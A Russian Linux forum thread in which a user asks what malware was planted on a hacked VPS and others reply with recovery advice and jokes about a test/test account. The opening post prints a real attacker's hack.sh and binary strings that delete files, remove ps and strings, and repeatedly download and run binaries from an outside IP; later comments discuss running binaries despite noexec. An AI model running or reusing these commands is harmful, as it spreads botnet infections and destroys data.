Что это за гадость на моей VPS

1

4

server:~# ls /tmp
?  bb  busybox	dd  ll	mm  oo

cat /tmp/busybox
<бинарный файл>
>%$#%d.%d.%d.%d%d.%d.%d.0ogin:
assword:ncorrectsh
cd /tmp || cd /var/run;rm -f *;busybox wget http://69.30.225.250/hack.sh;sh hack.sh;busybox rm -rf hack.sh;busybox tftp -r tftp.sh -g 69.30.225.250;sh tftp.sh; rm -rf tftp.sh
/bin/busybox;echo -e '\147\141\171\146\147\164'
gayfgtulti-callREPORT %s:%s:%sREPORT %s:%s:
<бинарный файл>

server:~# wget http://69.30.225.250/hack.sh -O-
--2015-10-18 21:59:14--  http://69.30.225.250/hack.sh
Подключение к 69.30.225.250:80... соединение установлено.
HTTP-запрос отправлен. Ожидание ответа... 200 OK
Длина: 1548 (1,5K) [text/x-sh]
Сохранение в каталог: ««STDOUT»».

 0% [                                                                                                                                                                                                    ] 0           --.-K/s              #!/bin/bash
busybox rm -rf /tmp/*
busybox rm -rf /root/*
busybox rm -rf /usr/bin/strings
busybox rm -fr /usr/bin/ps
cd /tmp; busybox wget http://69.30.225.250/bb; busybox chmod +x bb; ./bb; busybox rm -f bb*
cd /tmp; busybox wget http://69.30.225.250/dd; busybox chmod +x dd; ./dd; busybox rm -f dd*
cd /tmp; busybox wget http://69.30.225.250/oo; busybox chmod +x oo; ./oo; busybox rm -f oo*
cd /tmp; busybox wget http://69.30.225.250/ll; busybox chmod +x ll; ./ll; busybox rm -f ll*
cd /tmp; busybox wget http://69.30.225.250/mm; busybox chmod +x mm; ./mm; busybox rm -f mm*
cd /tmp; busybox wget http://69.30.225.250/bb; busybox cp /bin/busybox ./; busybox cat bb > busybox; busybox rm -f bb; busybox cp busybox bb; busybox rm -f busybox; ./bb; busybox rm -f bb*
cd /tmp; busybox wget http://69.30.225.250/dd; busybox cp /bin/busybox ./; busybox cat dd > busybox; busybox rm -f dd; busybox cp busybox dd; busybox rm -f busybox; ./dd; busybox rm -f dd*
cd /tmp; busybox wget http://69.30.225.250/oo; busybox cp /bin/busybox ./; busybox cat oo > busybox; busybox rm -f oo; busybox cp busybox oo; busybox rm -f busybox; ./oo; busybox rm -f oo*
cd /tmp; busybox wget http://69.30.225.250/ll; busybox cp /bin/busybox ./; busybox cat ll > busybox; busybox rm -f ll; busybox cp busybox ll; busybox rm -f busybox; ./ll; busybox rm -f ll*
cd /tmp; busybox wget http://69.30.225.250/mm; busybox cp /bin/busybox ./; busybox cat mm > busybox; busybox rm -f mm; busybox cp busybox mm; busybox rm -f busybox; ./mm; busybox rm -f mm*
rm -f bin*
100%[===================================================================================================================================================================================================>] 1 548       --.-K/s   за 0s      

2015-10-18 21:59:14 (81,9 MB/s) - written to stdout [1548/1548]

server:~#

Понятно, что опять взломали

Ссылка

←	псевдо push нотификация

О выборе DNS сервера

→

Что это за гадость на моей VPS

Понятно, что опять взломали

А что ты хочешь от нас услышать?

generator ★★★
(19.10.15 01:07:33 MSK)

Ссылка

Поздравляю, у тебя прекрасный повод проверить состояние бэкапов, а заодно провести аудит паролей и сервисов, что там крутятся.

x3al ★★★★★
(19.10.15 01:11:12 MSK)

Ответ на: комментарий от x3al 19.10.15 01:11:12 MSK

Сейчас на VPS я настрою suricata, потом поставлю обновления безопаснасти

ne-vlezay ★★★★★
(19.10.15 01:45:37 MSK) автор топика

Ответ на: комментарий от ne-vlezay 19.10.15 01:45:37 MSK

Нет, сейчас ты его ресетапнешь, если не идиот. Потом поставишь апдейты, проведёшь базовую настройку системы, и только потом будешь пилить сурикату.

leave ★★★★★
(19.10.15 01:49:22 MSK)

Ссылка

проверь на руткиты

w1nner ★★★★★
(19.10.15 01:58:34 MSK)

Ответ на: комментарий от w1nner 19.10.15 01:58:34 MSK

Можно узнать, нафиг это нужно?

x3al ★★★★★
(19.10.15 02:11:36 MSK)

Ссылка

Залей куда-нибудь файл, покопаюсь.

anonymous
(19.10.15 02:13:58 MSK)

Ответ на: комментарий от anonymous 19.10.15 02:13:58 MSK

Плюсую данную идею. UPD: А все, файлы сам нашел.

~~daniilArch~~ ★★
(19.10.15 02:31:07 MSK)
Последнее исправление: daniilArch 19.10.15 02:36:40 MSK (всего исправлений: 2)

Ссылка

ох-ох

легко говорирть «проверь на руткиты», а как это сделать?

ты уверен, что у тебя в системе не сидит руткит, а? а чем докажешь?

anonymous
(19.10.15 02:37:42 MSK)

Ответ на: комментарий от anonymous 19.10.15 02:37:42 MSK

Используй утилиту AI-Bolit https://revisium.com/ai/

rootmaster ★
(19.10.15 09:17:03 MSK)

Ответ на: комментарий от x3al 19.10.15 01:11:12 MSK

Итак, мной аудит проведён. Результат: аккаунт test с паролем test. Я его давно не использовал, и не знал что кто-то сможет ещё его использовать

ne-vlezay ★★★★★
(19.10.15 09:29:10 MSK) автор топика

Ответ на: комментарий от ne-vlezay 19.10.15 09:29:10 MSK

Результат: аккаунт test с паролем test. Я его давно не использовал, и не знал что кто-то сможет ещё его использовать

Вот это анекдот. Я то думал, что так что-то сломать уже с середины 90-х нельзя, все учЁные. А вот поди-ж ты.

no-such-file ★★★★★
(19.10.15 10:28:34 MSK)

Ссылка

Ответ на: комментарий от ne-vlezay 19.10.15 09:29:10 MSK

В квотезы, однозначно.

dhameoelin ★★★★★
(19.10.15 10:30:43 MSK)

Ссылка

Ответ на: комментарий от ne-vlezay 19.10.15 09:29:10 MSK

аккаунт test с паролем test
Я его давно не использовал
не знал что кто-то сможет ещё его использовать

Этапять. Каждое следующее предложение лучше предыдущего. Что ж ты делаешь изверг, у меня только понедельник начался а я уже ржу как будто пятница случилась.

Pinkbyte ★★★★★
(19.10.15 10:48:58 MSK)

Ссылка

Ответ на: комментарий от ne-vlezay 19.10.15 09:29:10 MSK

Итак, мной аудит проведён. Результат: аккаунт test с паролем test. Я его давно не использовал, и не знал что кто-то сможет ещё его использовать

на главную повесьте или в галлерею.

~~kep~~
(19.10.15 10:59:49 MSK)

Ссылка

Ответ на: комментарий от ne-vlezay 19.10.15 09:29:10 MSK

Результат: аккаунт test с паролем test. Я его давно не использовал, и не знал что кто-то сможет ещё его использовать

«Я разделась и встала раком в тёмном парке, а через 10 минут почувствовала в себе инородный продолговатый предмет, откуда это?»

anonymous
(19.10.15 11:03:31 MSK)

Ссылка

Для генерации паролей я использую стихи репрессированных поэтов 30-х годов в определенном порядке. Советуем-с.

~~int13h~~ ★★★★★
(19.10.15 11:04:03 MSK)

rm -fr /usr/bin/ps

Надо бы челу сказать, что лучше фильтровать вывод. Не сразу админ догадается проверить /proc :)

cd /tmp

Тут тоже надо сделать поправку, ибо /tmp в современном интерпрайс монтируется с noexec.

~~gh0stwizard~~ ★★★★★
(19.10.15 11:19:07 MSK)
Последнее исправление: gh0stwizard 19.10.15 11:21:16 MSK (всего исправлений: 1)

Ответ на: комментарий от int13h 19.10.15 11:04:03 MSK

pwgen уже не в моде?

anonymous
(19.10.15 11:20:25 MSK)

Ссылка

Ответ на: комментарий от int13h 19.10.15 11:04:03 MSK

Даже сюда политику притащил. Это диагноз.

ashot ★★★★
(19.10.15 11:21:59 MSK)

Ответ на: комментарий от ashot 19.10.15 11:21:59 MSK

при чем тут политика? советую ознакомиться с культурой 30-х - 40-х в СССР - много хорошего есть, правда, уже забытого

~~int13h~~ ★★★★★
(19.10.15 11:23:50 MSK)
Последнее исправление: int13h 19.10.15 11:25:03 MSK (всего исправлений: 1)

Ссылка

Ответ на: комментарий от ashot 19.10.15 11:21:59 MSK

Да, и видеть во всем политику - это ватизм

~~int13h~~ ★★★★★
(19.10.15 11:39:12 MSK)

Ответ на: комментарий от int13h 19.10.15 11:39:12 MSK

Спасибо за подтверждение моих слов.)

ashot ★★★★
(19.10.15 11:48:32 MSK)

Ответ на: комментарий от ashot 19.10.15 11:48:32 MSK

каким образом поэзия относится к политике, ебанько?

anonymous
(19.10.15 11:57:22 MSK)

Ссылка

Ответ на: комментарий от gh0stwizard 19.10.15 11:19:07 MSK

ибо /tmp в современном интерпрайс монтируется с noexec.

Бестолку. Скрипты из темп вызываются интерпретатором.

roman77 ★★★★★
(19.10.15 12:02:12 MSK)

Ответ на: комментарий от roman77 19.10.15 12:02:12 MSK

Разве?

cd /tmp; ...; ./bb;

~~gh0stwizard~~ ★★★★★
(19.10.15 12:09:46 MSK)

Ответ на: комментарий от gh0stwizard 19.10.15 12:09:46 MSK

Разные бывают. В основном на noexec всем плевать.

roman77 ★★★★★
(19.10.15 12:21:40 MSK)

Ссылка

Ответ на: комментарий от rootmaster 19.10.15 09:17:03 MSK

лал

anonymous
(19.10.15 13:00:20 MSK)

Ссылка

Ответ на: комментарий от ne-vlezay 19.10.15 09:29:10 MSK

ЭтопатЪ!

itn ★★★
(19.10.15 15:13:36 MSK)

Ссылка

Ответ на: комментарий от gh0stwizard 19.10.15 12:09:46 MSK

кстати говоря, бинарники можно запускать и без exec привилегий, как-то так:

/lib/ld-linux-x86-64.so.2 /bin/ls

omnomnomnus ★
(19.10.15 16:06:49 MSK)

Ответ на: комментарий от omnomnomnus 19.10.15 16:06:49 MSK

кстати говоря, бинарники можно запускать и без exec привилегий, как-то так:

$ /lib/ld-linux.so.2 /bin/ls
/bin/ls: error while loading shared libraries: /bin/ls: wrong ELF class: ELFCLASS64

чяднт?

reprimand ★★★★★
(19.10.15 16:16:30 MSK)
Последнее исправление: reprimand 19.10.15 16:16:38 MSK (всего исправлений: 1)

Ответ на: комментарий от reprimand 19.10.15 16:16:30 MSK

/lib/ld-linux.so.2

$ readlink -f /lib/ld-linux.so.2
/lib32/ld-2.21.so

lib32
ELFCLASS64

deadNightTiger ★★★★★
(19.10.15 16:25:22 MSK)

Ответ на: комментарий от deadNightTiger 19.10.15 16:25:22 MSK

гм. Действительно :)

reprimand ★★★★★
(19.10.15 16:51:30 MSK)

Ссылка

это же stdout^W детский сад

anonymous
(19.10.15 17:17:03 MSK)

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

←	псевдо push нотификация

Admin

О выборе DNS сервера

→

Похожие темы